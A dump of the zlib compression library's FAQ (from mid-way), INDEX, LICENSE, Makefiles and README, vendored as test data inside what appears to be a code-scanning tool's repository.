/usr/local/lib or /usr/X11R6/lib. Remove any old versions, then do "make install". 10. I need a Delphi interface to zlib. See the contrib/delphi directory in the zlib distribution. 11. Can zlib handle .zip archives? Not by itself, no. See the directory contrib/minizip in the zlib distribution. 12. Can zlib handle .Z files? No, sorry. You have to spawn an uncompress or gunzip subprocess, or adapt the code of uncompress on your own. 13. How can I make a Unix shared library? By default a shared (and a static) library is built for Unix. So: make distclean ./configure make 14. How do I install a shared zlib library on Unix? After the above, then: make install However, many flavors of Unix come with a shared zlib already installed. Before going to the trouble of compiling a shared version of zlib and trying to install it, you may want to check if it's already there! If you can #include , it's there. The -lz option will probably link to it. You can check the version at the top of zlib.h or with the ZLIB_VERSION symbol defined in zlib.h . 15. I have a question about OttoPDF. We are not the authors of OttoPDF. The real author is on the OttoPDF web site: Joel Hainley, jhainley@myndkryme.com. 16. Can zlib decode Flate data in an Adobe PDF file? Yes. See http://www.pdflib.com/ . To modify PDF forms, see http://sourceforge.net/projects/acroformtool/ . 17. Why am I getting this "register_frame_info not found" error on Solaris? After installing zlib 1.1.4 on Solaris 2.6, running applications using zlib generates an error such as: ld.so.1: rpm: fatal: relocation error: file /usr/local/lib/libz.so: symbol __register_frame_info: referenced symbol not found The symbol __register_frame_info is not part of zlib, it is generated by the C compiler (cc or gcc). You must recompile applications using zlib which have this problem. This problem is specific to Solaris. See http://www.sunfreeware.com for Solaris versions of zlib and applications using zlib. 18. Why does gzip give an error on a file I make with compress/deflate? The compress and deflate functions produce data in the zlib format, which is different and incompatible with the gzip format. The gz* functions in zlib on the other hand use the gzip format. Both the zlib and gzip formats use the same compressed data format internally, but have different headers and trailers around the compressed data. 19. Ok, so why are there two different formats? The gzip format was designed to retain the directory information about a single file, such as the name and last modification date. The zlib format on the other hand was designed for in-memory and communication channel applications, and has a much more compact header and trailer and uses a faster integrity check than gzip. 20. Well that's nice, but how do I make a gzip file in memory? You can request that deflate write the gzip format instead of the zlib format using deflateInit2(). You can also request that inflate decode the gzip format using inflateInit2(). Read zlib.h for more details. 21. Is zlib thread-safe? Yes. However any library routines that zlib uses and any application- provided memory allocation routines must also be thread-safe. zlib's gz* functions use stdio library routines, and most of zlib's functions use the library memory allocation routines by default. zlib's *Init* functions allow for the application to provide custom memory allocation routines. Of course, you should only operate on any given zlib or gzip stream from a single thread at a time. 22. Can I use zlib in my commercial application? Yes. Please read the license in zlib.h. 23. Is zlib under the GNU license? No. Please read the license in zlib.h. 24. The license says that altered source versions must be "plainly marked". So what exactly do I need to do to meet that requirement? You need to change the ZLIB_VERSION and ZLIB_VERNUM #defines in zlib.h. In particular, the final version number needs to be changed to "f", and an identification string should be appended to ZLIB_VERSION. Version numbers x.x.x.f are reserved for modifications to zlib by others than the zlib maintainers. For example, if the version of the base zlib you are altering is "1.2.3.4", then in zlib.h you should change ZLIB_VERNUM to 0x123f, and ZLIB_VERSION to something like "1.2.3.f-zachary-mods-v3". You can also update the version strings in deflate.c and inftrees.c. For altered source distributions, you should also note the origin and nature of the changes in zlib.h, as well as in ChangeLog and README, along with the dates of the alterations. The origin should include at least your name (or your company's name), and an email address to contact for help or issues with the library. Note that distributing a compiled zlib library along with zlib.h and zconf.h is also a source distribution, and so you should change ZLIB_VERSION and ZLIB_VERNUM and note the origin and nature of the changes in zlib.h as you would for a full source distribution. 25. Will zlib work on a big-endian or little-endian architecture, and can I exchange compressed data between them? Yes and yes. 26. Will zlib work on a 64-bit machine? Yes. It has been tested on 64-bit machines, and has no dependence on any data types being limited to 32-bits in length. If you have any difficulties, please provide a complete problem report to zlib@gzip.org 27. Will zlib decompress data from the PKWare Data Compression Library? No. The PKWare DCL uses a completely different compressed data format than does PKZIP and zlib. However, you can look in zlib's contrib/blast directory for a possible solution to your problem. 28. Can I access data randomly in a compressed stream? No, not without some preparation. If when compressing you periodically use Z_FULL_FLUSH, carefully write all the pending data at those points, and keep an index of those locations, then you can start decompression at those points. You have to be careful to not use Z_FULL_FLUSH too often, since it can significantly degrade compression. Alternatively, you can scan a deflate stream once to generate an index, and then use that index for random access. See examples/zran.c . 29. Does zlib work on MVS, OS/390, CICS, etc.? It has in the past, but we have not heard of any recent evidence. There were working ports of zlib 1.1.4 to MVS, but those links no longer work. If you know of recent, successful applications of zlib on these operating systems, please let us know. Thanks. 30. Is there some simpler, easier to read version of inflate I can look at to understand the deflate format? First off, you should read RFC 1951. Second, yes. Look in zlib's contrib/puff directory. 31. Does zlib infringe on any patents? As far as we know, no. In fact, that was originally the whole point behind zlib. Look here for some more information: http://www.gzip.org/#faq11 32. Can zlib work with greater than 4 GB of data? Yes. inflate() and deflate() will process any amount of data correctly. Each call of inflate() or deflate() is limited to input and output chunks of the maximum value that can be stored in the compiler's "unsigned int" type, but there is no limit to the number of chunks. Note however that the strm.total_in and strm_total_out counters may be limited to 4 GB. These counters are provided as a convenience and are not used internally by inflate() or deflate(). The application can easily set up its own counters updated after each call of inflate() or deflate() to count beyond 4 GB. compress() and uncompress() may be limited to 4 GB, since they operate in a single call. gzseek() and gztell() may be limited to 4 GB depending on how zlib is compiled. See the zlibCompileFlags() function in zlib.h. The word "may" appears several times above since there is a 4 GB limit only if the compiler's "long" type is 32 bits. If the compiler's "long" type is 64 bits, then the limit is 16 exabytes. 33. Does zlib have any security vulnerabilities? The only one that we are aware of is potentially in gzprintf(). If zlib is compiled to use sprintf() or vsprintf(), then there is no protection against a buffer overflow of an 8K string space (or other value as set by gzbuffer()), other than the caller of gzprintf() assuring that the output will not exceed 8K. On the other hand, if zlib is compiled to use snprintf() or vsnprintf(), which should normally be the case, then there is no vulnerability. The ./configure script will display warnings if an insecure variation of sprintf() will be used by gzprintf(). Also the zlibCompileFlags() function will return information on what variant of sprintf() is used by gzprintf(). If you don't have snprintf() or vsnprintf() and would like one, you can find a portable implementation here: http://www.ijs.si/software/snprintf/ Note that you should be using the most recent version of zlib. Versions 1.1.3 and before were subject to a double-free vulnerability, and versions 1.2.1 and 1.2.2 were subject to an access exception when decompressing invalid compressed data. 34. Is there a Java version of zlib? Probably what you want is to use zlib in Java. zlib is already included as part of the Java SDK in the java.util.zip package. If you really want a version of zlib written in the Java language, look on the zlib home page for links: http://zlib.net/ . 35. I get this or that compiler or source-code scanner warning when I crank it up to maximally-pedantic. Can't you guys write proper code? Many years ago, we gave up attempting to avoid warnings on every compiler in the universe. It just got to be a waste of time, and some compilers were downright silly as well as contradicted each other. So now, we simply make sure that the code always works. 36. Valgrind (or some similar memory access checker) says that deflate is performing a conditional jump that depends on an uninitialized value. Isn't that a bug? No. That is intentional for performance reasons, and the output of deflate is not affected. This only started showing up recently since zlib 1.2.x uses malloc() by default for allocations, whereas earlier versions used calloc(), which zeros out the allocated memory. Even though the code was correct, versions 1.2.4 and later was changed to not stimulate these checkers. 37. Will zlib read the (insert any ancient or arcane format here) compressed data format? Probably not. Look in the comp.compression FAQ for pointers to various formats and associated software. 38. How can I encrypt/decrypt zip files with zlib? zlib doesn't support encryption. The original PKZIP encryption is very weak and can be broken with freely available programs. To get strong encryption, use GnuPG, http://www.gnupg.org/ , which already includes zlib compression. For PKZIP compatible "encryption", look at http://www.info-zip.org/ 39. What's the difference between the "gzip" and "deflate" HTTP 1.1 encodings? "gzip" is the gzip format, and "deflate" is the zlib format. They should probably have called the second one "zlib" instead to avoid confusion with the raw deflate compressed data format. While the HTTP 1.1 RFC 2616 correctly points to the zlib specification in RFC 1950 for the "deflate" transfer encoding, there have been reports of servers and browsers that incorrectly produce or expect raw deflate data per the deflate specification in RFC 1951, most notably Microsoft. So even though the "deflate" transfer encoding using the zlib format would be the more efficient approach (and in fact exactly what the zlib format was designed for), using the "gzip" transfer encoding is probably more reliable due to an unfortunate choice of name on the part of the HTTP 1.1 authors. Bottom line: use the gzip format for HTTP 1.1 encoding. 40. Does zlib support the new "Deflate64" format introduced by PKWare? No. PKWare has apparently decided to keep that format proprietary, since they have not documented it as they have previous compression formats. In any case, the compression improvements are so modest compared to other more modern approaches, that it's not worth the effort to implement. 41. I'm having a problem with the zip functions in zlib, can you help? There are no zip functions in zlib. You are probably using minizip by Giles Vollant, which is found in the contrib directory of zlib. It is not part of zlib. In fact none of the stuff in contrib is part of zlib. The files in there are not supported by the zlib authors. You need to contact the authors of the respective contribution for help. 42. The match.asm code in contrib is under the GNU General Public License. Since it's part of zlib, doesn't that mean that all of zlib falls under the GNU GPL? No. The files in contrib are not part of zlib. They were contributed by other authors and are provided as a convenience to the user within the zlib distribution. Each item in contrib has its own license. 43. Is zlib subject to export controls? What is its ECCN? zlib is not subject to export controls, and so is classified as EAR99. 44. Can you please sign these lengthy legal documents and fax them back to us so that we can use your software in our product? No. Go away. Shoo. ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/INDEX ================================================ CMakeLists.txt cmake build file ChangeLog history of changes FAQ Frequently Asked Questions about zlib INDEX this file Makefile dummy Makefile that tells you to ./configure Makefile.in template for Unix Makefile README guess what configure configure script for Unix make_vms.com makefile for VMS test/example.c zlib usages examples for build testing test/minigzip.c minimal gzip-like functionality for build testing test/infcover.c inf*.c code coverage for build coverage testing treebuild.xml XML description of source file dependencies zconf.h.cmakein zconf.h template for cmake zconf.h.in zconf.h template for configure zlib.3 Man page for zlib zlib.3.pdf Man page in PDF format zlib.map Linux symbol information zlib.pc.in Template for pkg-config descriptor zlib.pc.cmakein zlib.pc template for cmake zlib2ansi perl script to convert source files for C++ compilation amiga/ makefiles for Amiga SAS C as400/ makefiles for AS/400 doc/ documentation for formats and algorithms msdos/ makefiles for MSDOS nintendods/ makefile for Nintendo DS old/ makefiles for various architectures and zlib documentation files that have not yet been updated for zlib 1.2.x qnx/ makefiles for QNX watcom/ makefiles for OpenWatcom win32/ makefiles for Windows zlib public header files (required for library use): zconf.h zlib.h private source files used to build the zlib library: adler32.c compress.c crc32.c crc32.h deflate.c deflate.h gzclose.c gzguts.h gzlib.c gzread.c gzwrite.c infback.c inffast.c inffast.h inffixed.h inflate.c inflate.h inftrees.c inftrees.h trees.c trees.h uncompr.c zutil.c zutil.h source files for sample programs See examples/README.examples unsupported contributions by third parties See contrib/README.contrib ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/LICENSE ================================================ Copyright notice: (C) 1995-2022 Jean-loup Gailly and Mark Adler This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. Jean-loup Gailly Mark Adler jloup@gzip.org madler@alumni.caltech.edu ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/Makefile ================================================ all: -@echo "Please use ./configure first. Thank you." distclean: make -f Makefile.in distclean ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/Makefile.in ================================================ # Makefile for zlib # Copyright (C) 1995-2017 Jean-loup Gailly, Mark Adler # For conditions of distribution and use, see copyright notice in zlib.h # To compile and test, type: # ./configure; make test # Normally configure builds both a static and a shared library. # If you want to build just a static library, use: ./configure --static # To install /usr/local/lib/libz.* and /usr/local/include/zlib.h, type: # make install # To install in $HOME instead of /usr/local, use: # make install prefix=$HOME CC=cc CFLAGS=-O #CFLAGS=-O -DMAX_WBITS=14 -DMAX_MEM_LEVEL=7 #CFLAGS=-g -DZLIB_DEBUG #CFLAGS=-O3 -Wall -Wwrite-strings -Wpointer-arith -Wconversion \ # -Wstrict-prototypes -Wmissing-prototypes SFLAGS=-O LDFLAGS= TEST_LDFLAGS=$(LDFLAGS) -L. libz.a LDSHARED=$(CC) CPP=$(CC) -E STATICLIB=libz.a SHAREDLIB=libz.so SHAREDLIBV=libz.so.1.3 SHAREDLIBM=libz.so.1 LIBS=$(STATICLIB) $(SHAREDLIBV) AR=ar ARFLAGS=rc RANLIB=ranlib LDCONFIG=ldconfig LDSHAREDLIBC=-lc TAR=tar SHELL=/bin/sh EXE= prefix = /usr/local exec_prefix = ${prefix} libdir = ${exec_prefix}/lib sharedlibdir = ${libdir} includedir = ${prefix}/include mandir = ${prefix}/share/man man3dir = ${mandir}/man3 pkgconfigdir = ${libdir}/pkgconfig SRCDIR= ZINC= ZINCOUT=-I. OBJZ = adler32.o crc32.o deflate.o infback.o inffast.o inflate.o inftrees.o trees.o zutil.o OBJG = compress.o uncompr.o gzclose.o gzlib.o gzread.o gzwrite.o OBJC = $(OBJZ) $(OBJG) PIC_OBJZ = adler32.lo crc32.lo deflate.lo infback.lo inffast.lo inflate.lo inftrees.lo trees.lo zutil.lo PIC_OBJG = compress.lo uncompr.lo gzclose.lo gzlib.lo gzread.lo gzwrite.lo PIC_OBJC = $(PIC_OBJZ) $(PIC_OBJG) # to use the asm code: make OBJA=match.o, PIC_OBJA=match.lo OBJA = PIC_OBJA = OBJS = $(OBJC) $(OBJA) PIC_OBJS = $(PIC_OBJC) $(PIC_OBJA) all: static shared static: example$(EXE) minigzip$(EXE) shared: examplesh$(EXE) minigzipsh$(EXE) all64: example64$(EXE) minigzip64$(EXE) check: test test: all teststatic testshared teststatic: static @TMPST=tmpst_$$; \ if echo hello world | ${QEMU_RUN} ./minigzip | ${QEMU_RUN} ./minigzip -d && ${QEMU_RUN} ./example $$TMPST ; then \ echo ' *** zlib test OK ***'; \ else \ echo ' *** zlib test FAILED ***'; false; \ fi @rm -f tmpst_$$ testshared: shared @LD_LIBRARY_PATH=`pwd`:$(LD_LIBRARY_PATH) ; export LD_LIBRARY_PATH; \ LD_LIBRARYN32_PATH=`pwd`:$(LD_LIBRARYN32_PATH) ; export LD_LIBRARYN32_PATH; \ DYLD_LIBRARY_PATH=`pwd`:$(DYLD_LIBRARY_PATH) ; export DYLD_LIBRARY_PATH; \ SHLIB_PATH=`pwd`:$(SHLIB_PATH) ; export SHLIB_PATH; \ TMPSH=tmpsh_$$; \ if echo hello world | ${QEMU_RUN} ./minigzipsh | ${QEMU_RUN} ./minigzipsh -d && ${QEMU_RUN} ./examplesh $$TMPSH; then \ echo ' *** zlib shared test OK ***'; \ else \ echo ' *** zlib shared test FAILED ***'; false; \ fi @rm -f tmpsh_$$ test64: all64 @TMP64=tmp64_$$; \ if echo hello world | ${QEMU_RUN} ./minigzip64 | ${QEMU_RUN} ./minigzip64 -d && ${QEMU_RUN} ./example64 $$TMP64; then \ echo ' *** zlib 64-bit test OK ***'; \ else \ echo ' *** zlib 64-bit test FAILED ***'; false; \ fi @rm -f tmp64_$$ infcover.o: $(SRCDIR)test/infcover.c $(SRCDIR)zlib.h zconf.h $(CC) $(CFLAGS) $(ZINCOUT) -c -o $@ $(SRCDIR)test/infcover.c infcover: infcover.o libz.a $(CC) $(CFLAGS) -o $@ infcover.o libz.a cover: infcover rm -f *.gcda ${QEMU_RUN} ./infcover gcov inf*.c libz.a: $(OBJS) $(AR) $(ARFLAGS) $@ $(OBJS) -@ ($(RANLIB) $@ || true) >/dev/null 2>&1 match.o: match.S $(CPP) match.S > _match.s $(CC) -c _match.s mv _match.o match.o rm -f _match.s match.lo: match.S $(CPP) match.S > _match.s $(CC) -c -fPIC _match.s mv _match.o match.lo rm -f _match.s example.o: $(SRCDIR)test/example.c $(SRCDIR)zlib.h zconf.h $(CC) $(CFLAGS) $(ZINCOUT) -c -o $@ $(SRCDIR)test/example.c minigzip.o: $(SRCDIR)test/minigzip.c $(SRCDIR)zlib.h zconf.h $(CC) $(CFLAGS) $(ZINCOUT) -c -o $@ $(SRCDIR)test/minigzip.c example64.o: $(SRCDIR)test/example.c $(SRCDIR)zlib.h zconf.h $(CC) $(CFLAGS) $(ZINCOUT) -D_FILE_OFFSET_BITS=64 -c -o $@ $(SRCDIR)test/example.c minigzip64.o: $(SRCDIR)test/minigzip.c $(SRCDIR)zlib.h zconf.h $(CC) $(CFLAGS) $(ZINCOUT) -D_FILE_OFFSET_BITS=64 -c -o $@ $(SRCDIR)test/minigzip.c adler32.o: $(SRCDIR)adler32.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)adler32.c crc32.o: $(SRCDIR)crc32.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)crc32.c deflate.o: $(SRCDIR)deflate.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)deflate.c infback.o: $(SRCDIR)infback.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)infback.c inffast.o: $(SRCDIR)inffast.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)inffast.c inflate.o: $(SRCDIR)inflate.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)inflate.c inftrees.o: $(SRCDIR)inftrees.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)inftrees.c trees.o: $(SRCDIR)trees.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)trees.c zutil.o: $(SRCDIR)zutil.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)zutil.c compress.o: $(SRCDIR)compress.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)compress.c uncompr.o: $(SRCDIR)uncompr.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)uncompr.c gzclose.o: $(SRCDIR)gzclose.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)gzclose.c gzlib.o: $(SRCDIR)gzlib.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)gzlib.c gzread.o: $(SRCDIR)gzread.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)gzread.c gzwrite.o: $(SRCDIR)gzwrite.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)gzwrite.c adler32.lo: $(SRCDIR)adler32.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/adler32.o $(SRCDIR)adler32.c -@mv objs/adler32.o $@ crc32.lo: $(SRCDIR)crc32.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/crc32.o $(SRCDIR)crc32.c -@mv objs/crc32.o $@ deflate.lo: $(SRCDIR)deflate.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/deflate.o $(SRCDIR)deflate.c -@mv objs/deflate.o $@ infback.lo: $(SRCDIR)infback.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/infback.o $(SRCDIR)infback.c -@mv objs/infback.o $@ inffast.lo: $(SRCDIR)inffast.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/inffast.o $(SRCDIR)inffast.c -@mv objs/inffast.o $@ inflate.lo: $(SRCDIR)inflate.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/inflate.o $(SRCDIR)inflate.c -@mv objs/inflate.o $@ inftrees.lo: $(SRCDIR)inftrees.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/inftrees.o $(SRCDIR)inftrees.c -@mv objs/inftrees.o $@ trees.lo: $(SRCDIR)trees.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/trees.o $(SRCDIR)trees.c -@mv objs/trees.o $@ zutil.lo: $(SRCDIR)zutil.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/zutil.o $(SRCDIR)zutil.c -@mv objs/zutil.o $@ compress.lo: $(SRCDIR)compress.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/compress.o $(SRCDIR)compress.c -@mv objs/compress.o $@ uncompr.lo: $(SRCDIR)uncompr.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/uncompr.o $(SRCDIR)uncompr.c -@mv objs/uncompr.o $@ gzclose.lo: $(SRCDIR)gzclose.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/gzclose.o $(SRCDIR)gzclose.c -@mv objs/gzclose.o $@ gzlib.lo: $(SRCDIR)gzlib.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/gzlib.o $(SRCDIR)gzlib.c -@mv objs/gzlib.o $@ gzread.lo: $(SRCDIR)gzread.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/gzread.o $(SRCDIR)gzread.c -@mv objs/gzread.o $@ gzwrite.lo: $(SRCDIR)gzwrite.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/gzwrite.o $(SRCDIR)gzwrite.c -@mv objs/gzwrite.o $@ placebo $(SHAREDLIBV): $(PIC_OBJS) libz.a $(LDSHARED) $(SFLAGS) -o $@ $(PIC_OBJS) $(LDSHAREDLIBC) $(LDFLAGS) rm -f $(SHAREDLIB) $(SHAREDLIBM) ln -s $@ $(SHAREDLIB) ln -s $@ $(SHAREDLIBM) -@rmdir objs example$(EXE): example.o $(STATICLIB) $(CC) $(CFLAGS) -o $@ example.o $(TEST_LDFLAGS) minigzip$(EXE): minigzip.o $(STATICLIB) $(CC) $(CFLAGS) -o $@ minigzip.o $(TEST_LDFLAGS) examplesh$(EXE): example.o $(SHAREDLIBV) $(CC) $(CFLAGS) -o $@ example.o $(LDFLAGS) -L. $(SHAREDLIBV) minigzipsh$(EXE): minigzip.o $(SHAREDLIBV) $(CC) $(CFLAGS) -o $@ minigzip.o $(LDFLAGS) -L. $(SHAREDLIBV) example64$(EXE): example64.o $(STATICLIB) $(CC) $(CFLAGS) -o $@ example64.o $(TEST_LDFLAGS) minigzip64$(EXE): minigzip64.o $(STATICLIB) $(CC) $(CFLAGS) -o $@ minigzip64.o $(TEST_LDFLAGS) install-libs: $(LIBS) -@if [ ! -d $(DESTDIR)$(exec_prefix) ]; then mkdir -p $(DESTDIR)$(exec_prefix); fi -@if [ ! -d $(DESTDIR)$(libdir) ]; then mkdir -p $(DESTDIR)$(libdir); fi -@if [ ! -d $(DESTDIR)$(sharedlibdir) ]; then mkdir -p $(DESTDIR)$(sharedlibdir); fi -@if [ ! -d $(DESTDIR)$(man3dir) ]; then mkdir -p $(DESTDIR)$(man3dir); fi -@if [ ! -d $(DESTDIR)$(pkgconfigdir) ]; then mkdir -p $(DESTDIR)$(pkgconfigdir); fi rm -f $(DESTDIR)$(libdir)/$(STATICLIB) cp $(STATICLIB) $(DESTDIR)$(libdir) chmod 644 $(DESTDIR)$(libdir)/$(STATICLIB) -@($(RANLIB) $(DESTDIR)$(libdir)/libz.a || true) >/dev/null 2>&1 -@if test -n "$(SHAREDLIBV)"; then \ rm -f $(DESTDIR)$(sharedlibdir)/$(SHAREDLIBV); \ cp $(SHAREDLIBV) $(DESTDIR)$(sharedlibdir); \ echo "cp $(SHAREDLIBV) $(DESTDIR)$(sharedlibdir)"; \ chmod 755 $(DESTDIR)$(sharedlibdir)/$(SHAREDLIBV); \ echo "chmod 755 $(DESTDIR)$(sharedlibdir)/$(SHAREDLIBV)"; \ rm -f $(DESTDIR)$(sharedlibdir)/$(SHAREDLIB) $(DESTDIR)$(sharedlibdir)/$(SHAREDLIBM); \ ln -s $(SHAREDLIBV) $(DESTDIR)$(sharedlibdir)/$(SHAREDLIB); \ ln -s $(SHAREDLIBV) $(DESTDIR)$(sharedlibdir)/$(SHAREDLIBM); \ ($(LDCONFIG) || true) >/dev/null 2>&1; \ fi rm -f $(DESTDIR)$(man3dir)/zlib.3 cp $(SRCDIR)zlib.3 $(DESTDIR)$(man3dir) chmod 644 $(DESTDIR)$(man3dir)/zlib.3 rm -f $(DESTDIR)$(pkgconfigdir)/zlib.pc cp zlib.pc $(DESTDIR)$(pkgconfigdir) chmod 644 $(DESTDIR)$(pkgconfigdir)/zlib.pc # The ranlib in install is needed on NeXTSTEP which checks file times # ldconfig is for Linux install: install-libs -@if [ ! -d $(DESTDIR)$(includedir) ]; then mkdir -p $(DESTDIR)$(includedir); fi rm -f $(DESTDIR)$(includedir)/zlib.h $(DESTDIR)$(includedir)/zconf.h cp $(SRCDIR)zlib.h zconf.h $(DESTDIR)$(includedir) chmod 644 $(DESTDIR)$(includedir)/zlib.h $(DESTDIR)$(includedir)/zconf.h uninstall: cd $(DESTDIR)$(includedir) && rm -f zlib.h zconf.h cd $(DESTDIR)$(libdir) && rm -f libz.a; \ if test -n "$(SHAREDLIBV)" -a -f $(SHAREDLIBV); then \ rm -f $(SHAREDLIBV) $(SHAREDLIB) $(SHAREDLIBM); \ fi cd $(DESTDIR)$(man3dir) && rm -f zlib.3 cd $(DESTDIR)$(pkgconfigdir) && rm -f zlib.pc docs: zlib.3.pdf zlib.3.pdf: $(SRCDIR)zlib.3 groff -mandoc -f H -T ps $(SRCDIR)zlib.3 | ps2pdf - $@ zconf.h.cmakein: $(SRCDIR)zconf.h.in -@ TEMPFILE=zconfh_$$; \ echo "/#define ZCONF_H/ a\\\\\n#cmakedefine Z_PREFIX\\\\\n#cmakedefine Z_HAVE_UNISTD_H\n" >> $$TEMPFILE &&\ sed -f $$TEMPFILE $(SRCDIR)zconf.h.in > $@ &&\ touch -r $(SRCDIR)zconf.h.in $@ &&\ rm $$TEMPFILE zconf: $(SRCDIR)zconf.h.in cp -p $(SRCDIR)zconf.h.in zconf.h minizip-test: static cd contrib/minizip && { CFLAGS="$(CFLAGS)" $(MAKE) test ; cd ../.. ; } minizip-clean: cd contrib/minizip && { $(MAKE) clean ; cd ../.. ; } mostlyclean: clean clean: minizip-clean rm -f *.o *.lo *~ \ example$(EXE) minigzip$(EXE) examplesh$(EXE) minigzipsh$(EXE) \ example64$(EXE) minigzip64$(EXE) \ infcover \ libz.* foo.gz so_locations \ _match.s maketree contrib/infback9/*.o rm -rf objs rm -f *.gcda *.gcno *.gcov rm -f contrib/infback9/*.gcda contrib/infback9/*.gcno contrib/infback9/*.gcov maintainer-clean: distclean distclean: clean zconf zconf.h.cmakein rm -f Makefile zlib.pc configure.log -@rm -f .DS_Store @if [ -f Makefile.in ]; then \ printf 'all:\n\t-@echo "Please use ./configure first. Thank you."\n' > Makefile ; \ printf '\ndistclean:\n\tmake -f Makefile.in distclean\n' >> Makefile ; \ touch -r $(SRCDIR)Makefile.in Makefile ; fi tags: etags $(SRCDIR)*.[ch] adler32.o zutil.o: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h gzclose.o gzlib.o gzread.o gzwrite.o: $(SRCDIR)zlib.h zconf.h $(SRCDIR)gzguts.h compress.o example.o minigzip.o uncompr.o: $(SRCDIR)zlib.h zconf.h crc32.o: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)crc32.h deflate.o: $(SRCDIR)deflate.h $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h infback.o inflate.o: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)inftrees.h $(SRCDIR)inflate.h $(SRCDIR)inffast.h $(SRCDIR)inffixed.h inffast.o: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)inftrees.h $(SRCDIR)inflate.h $(SRCDIR)inffast.h inftrees.o: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)inftrees.h trees.o: $(SRCDIR)deflate.h $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)trees.h adler32.lo zutil.lo: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h gzclose.lo gzlib.lo gzread.lo gzwrite.lo: $(SRCDIR)zlib.h zconf.h $(SRCDIR)gzguts.h compress.lo example.lo minigzip.lo uncompr.lo: $(SRCDIR)zlib.h zconf.h crc32.lo: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)crc32.h deflate.lo: $(SRCDIR)deflate.h $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h infback.lo inflate.lo: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)inftrees.h $(SRCDIR)inflate.h $(SRCDIR)inffast.h $(SRCDIR)inffixed.h inffast.lo: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)inftrees.h $(SRCDIR)inflate.h $(SRCDIR)inffast.h inftrees.lo: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)inftrees.h trees.lo: $(SRCDIR)deflate.h $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)trees.h ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/README ================================================ ZLIB DATA COMPRESSION LIBRARY zlib 1.3 is a general purpose data compression library. All the code is thread safe. The data format used by the zlib library is described by RFCs (Request for Comments) 1950 to 1952 in the files http://tools.ietf.org/html/rfc1950 (zlib format), rfc1951 (deflate format) and rfc1952 (gzip format). All functions of the compression library are documented in the file zlib.h (volunteer to write man pages welcome, contact zlib@gzip.org). A usage example of the library is given in the file test/example.c which also tests that the library is working correctly. Another example is given in the file test/minigzip.c. The compression library itself is composed of all source files in the root directory. 